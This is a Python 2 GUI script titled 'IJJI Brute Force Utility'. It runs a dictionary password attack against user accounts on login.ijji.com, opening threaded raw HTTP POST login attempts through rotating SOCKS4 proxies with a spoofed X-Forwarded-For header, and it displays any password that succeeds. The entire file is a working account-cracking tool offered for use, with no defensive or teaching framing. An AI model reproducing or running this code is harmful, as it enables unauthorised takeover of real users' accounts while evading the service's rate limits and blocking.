#!/usr/bin/python from Tkinter import * import socks, sys, thread, time, os, tkFileDialog main = Tk() main.geometry("250x80") main.title("IJJI Brute Force Utility") sHost = [] sPort = [] bPassword = [] socksImported = 0 def importDict(x): i = 0 file = open(x, 'r') for line in file.readlines(): bPassword.append(line) bPassword[i] = bPassword[i].strip('\n') i = i + 1 file.close() print "Dictionary List imported successfully" def importSOCKS(x): global socksImported i = 0 file = open(x, 'r') for line in file.readlines(): sHost.append(line) sPort.append(line) sPort[i] = sHost[i].strip('\n').split(':')[1] sHost[i] = sHost[i].strip('\n').split(':')[0] i = i + 1 file.close() print "SOCKS List imported successfully" socksImported = 1 def hAbout(): hAbout = Tk() hAbout.geometry("330x60") hAbout.title("About") labelAbout = Label(hAbout, text="made by syn0de entirely (not that it's some great feat); so far,\n to keep simplicity intact, only SOCKS4 proxies are being used. You \ncan switch to SOCKS5/HTTP by editing the script itself. Have fun!") labelAbout.pack() def openDict(): x = tkFileDialog.askopenfilename() if x == '': print "Error: No file was selected." else: print "File Selected: ", x importDict(x) def openSOCKS(): x = tkFileDialog.askopenfilename() if x == '': print "Error: No file was selected." else: print "File Selected: ", x importSOCKS(x) def launchBrute(): x = 0 i = 0 n = 0 z = 0 for item in bPassword: x = x + 1 for item in sHost: n = n + 1 if x == 0: print "Error: no valid password file imported." else: bUsername = textUser.get() if bUsername == '': print "Error: no target (Username) supplied." else: textUser.configure(state=DISABLED) buttonBrute.configure(state=DISABLED) print "Bruteforcing now.." print "Note: This program *may* appear to freeze up, but unless your system appears to be unusually laggy, etc, it is still running!"; while i < x: try: while z < n: k = thread.start_new_thread(Brute, (i, x, z, bUsername,)); # Launch the attack! i = i + 1 # Increment through the password file so we don't go in circles z = z + 1 # This is for the SOCKS proxy tracker, so we don't go out of the array z = 0 # Return to the top of the array when we're done! time.sleep(0.1) # Delay between threads, otherwise we could very well crash except: print "Unable to start new thread - shutting down.."; print "Current line in password file:",i; time.sleep(3); sys.exit(); # Exit program, since we probably hit our max-thread/max-socket limit def Brute(x, y, n, bUsername): global socksImported s = socks.socksocket() # Open a socket if socksImported == 1: print "Using SOCKS4 proxy:", sHost[n] s.setproxy(socks.PROXY_TYPE_SOCKS4, sHost[n], int(sPort[n])) try: s.connect(("login.ijji.com", 80)) # Connecting to the login webpage except: print "Error: Unable to connect; is the proxy working?" sys.exit() dLength = 36 + len(bUsername) + len(bPassword[x]); # Content-Length header value; required for POST s.send("POST /login.nhn HTTP/1.1\r\nHost: login.ijji.com\r\nReferer: http://login.ijji.com/login.nhn\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\nX-Forwarded-For: 206.82.212.79\r\nContent-Length:"); s.send(str(dLength)); s.send("\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"); s.send("m=login&nextURL=&memberid="); s.send(bUsername); s.send("&password="); s.send(bPassword[x]); loginD = s.recv(1396); # Recieve a portion of our new page pL = loginD.find('form name="postForm"'); # If successful, this string will be on the new page if pL >= 0: # If it is a number, looks like it was found! print "Username:", bUsername; print "Password:", bPassword[x]; winLog = Tk() winLog.geometry("250x80") winLog.title("Login Information") winFrame = Frame(winLog) labelLogU = Label(winFrame, text="Username: ") labelDataU = Label(winFrame, text=bUsername) labelLogP = Label(winFrame, text="Password: ") labelDataP = Label(winFrame, text=bPassword[x]) winFrame.grid(row=0, column=2, rowspan=2) labelLogU.grid(row=1, column=1) labelDataU.grid(row=1, column=2) labelLogP.grid(row=2, column=1) labelDataP.grid(row=2, column=2) winLog.mainloop() s.close() # Gracefully close the connection, in case the server hasn't print "Completion status:", x, "out of", y, "; password:", bPassword[x] if y == x+1: textUser.configure(state=NORMAL) buttonBrute.configure(state=NORMAL) print "Sorry, no password was found with the dictionary file used. Maybe try a new dict?"; menubar = Menu(main) # Add a menu main.config(menu=menubar) # Adjust our window so it knows there's a menu filemenu = Menu(menubar, tearoff=0) # Add a file tab helpmenu = Menu(menubar, tearoff=0) # Add a help tab menubar.add_cascade(label="File", menu=filemenu) # Officially add the file tab and name it menubar.add_cascade(label="Help", menu=helpmenu) # Officially add the help tab and name it filemenu.add_command(label="Import Dict", command=openDict) # Allow the importing of password lists; added to the file menu filemenu.add_command(label="Import SOCKS", command=openSOCKS) # Allow the importing of password lists; added to the file menu filemenu.add_command(label="Exit", command=main.quit) # Allow user to easily exit; added to the file menu helpmenu.add_command(label="About", command=hAbout) # Let them know who made it; added to the help menu frame = Frame(main) # Add a frame for organization - it's useful with more content labelUser = Label(frame, text="Username: ") # Username label textUser = Entry(frame, bg="#000000", fg="#FFFFFF", width="20") # Textbox for username to target buttonBrute = Button(frame, text="Brute!", width="5", command=launchBrute) # The button to launch the attack labelUser.grid(row=1, column=1, padx=2, pady=2) # Display the username label w/some nice padding textUser.grid(row=1, column=2, padx=2, pady=2) # Do the same for the username textbox buttonBrute.grid(row=4, column=3, padx=3, pady=2) # ..the same for the button frame.grid(row=0, column=3, rowspan=3) # .. and the same for the frame main.mainloop() # Loop the display of objects